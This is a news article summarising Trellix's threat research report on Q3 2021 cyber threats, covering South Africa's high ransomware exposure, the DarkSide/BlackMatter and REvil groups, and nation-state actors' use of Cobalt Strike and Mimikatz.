SA is seventh on the list of countries that have suffered the most ransomware attacks, despite it only having the 32nd largest gross domestic product in the world.
This is according to Carlo Bolzonello, country manager for Trellix SA, discussing the findings of the company’s Advanced Threat Research Report: January 2022, which examines cyber criminal behaviour and activity related to cyber threats in the third quarter of 2021.
There are several reasons why attackers seem to find SA an attractive target. One of them is the fact that businesses might be coughing up the ransoms being asked of them because they don’t have the time or expertise to address attacks before they damage their operations.
“The other leading reason is linked to that: we’re a soft target because we don’t have enough skills in the country to respond to cyber crime – which is exacerbated by corporates buying multiple point products, and not having the resources they need to integrate them and manage them effectively.”
Raj Samani, chief scientist and fellow at Trellix, says while last year ended with a focus on the pandemic as well as revelations around the Log4j vulnerability, Trellix’s third-quarter deep dive into cyber threat activity found notable new tools and tactics among ransomware groups and advanced global threat actors.
“This report provides greater visibility into the use and abuse of ransomware group personas, how nation state APT actors seek to burrow deeper into finance and other critical industries, and new living-off-the-land attacks exploiting native Microsoft system tools in new ways,” says Samani.
With living-off-the-land attacks, bad actors leverage whatever is already available in the environment, as opposed to bringing a selection of custom tools and malware with them.
Reappearance of ransomware groups
In Q3 2021, Trellix noted the resurgence of the DarkSide ransomware group as BlackMatter, although the group claimed it had closed its doors.
In using many of the same modus operandi that DarkSide used in the Colonial Pipeline Attack, BlackMatter continued to leverage the double extortion approach, threatening to reveal the victims data unless they ponied up the ransom.
The notorious REvil or Sodinokibi ransomware family still topped the charts in terms of pervasiveness accounting for nearly half of Trellix’s ransomware detections. In addition, this group claimed responsibility for successfully infecting more than 1 million victims and then demanding $70 million, making it the largest publicly known ransom amount to date.
Advanced pattern techniques
Through the identification of indicators of compromise that are used to discover which tools have been used to execute attacks, Trellix saw an evolution of the techniques highly skilled APT actors use to slip through the security nets.
Q3 2021 saw security operations tools such as Cobalt Strike being abused by nation-state actors to gain access to their victim’s network. Cobalt Strike is an adversary simulation tool that is commonly used by ethical hackers to study attack methods and improve incident response. It was detected in over one-third of the APT campaigns tracked.
Mimikatz, a post exploitation tool used to gain additional access into a target’s network or elevate user-rights to execute tasks once an attacker has access on a victim’s device, was also detected in more than 25% of campaigns.